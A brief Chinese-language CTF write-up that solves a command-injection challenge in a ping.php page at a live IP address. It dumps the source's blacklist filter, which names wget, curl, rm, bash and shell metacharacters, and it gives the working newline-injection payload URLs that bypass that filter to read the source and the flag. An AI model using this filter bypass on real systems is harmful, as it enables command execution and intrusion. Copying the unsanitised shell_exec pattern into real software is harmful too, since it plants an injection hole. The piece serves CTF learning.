ctf里某群友发的题:http://45.124.115.155:8003/a74a15c5fb626077/**
ls cat 啥的都被过滤了(http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20ping.php):
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.086 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.086/0.086/0.086/0.000 ms
::::::::::::::
ping.php
::::::::::::::
'sbsbbsb',
';' => 'sb',
'|' => 'sb',
'-' => 'sb',
'$' => 'sb',
'(' => 'sb',
')' => 'sb',
'`' => 'sb',
'||' => 'sb',
'<>' => 'sb',
'bash' => 'sb',
'>' => 'sb',
'wget' => 'sb',
'cat' => '',
'cd' => 'sb',
'../' => 'sb',
'/' => 'sb',
'rm' => 'sb',
'>>' => 'sb',
'echo' => 'sb',
'curl' => 'sb',
'dd' => 'sb',
);
// Remove any of the charactars in the array (blacklist).
$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
// var_dump($target);
// Determine OS and execute the ping command.
if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
// Windows
$cmd = shell_exec( 'ping ' . $target );
}
else {
// *nix
$cmd = shell_exec( 'ping -c 1 ' . $target );
}
// Feedback for the end user
echo "{$cmd}";
%0a 代表换行
more读取文件(当初学点运维还是挺有用的)
payload:http://45.124.115.155:8003/a74a15c5fb626077/ping.php?ip=127.0.0.1%0Amore%20flag_is_here.php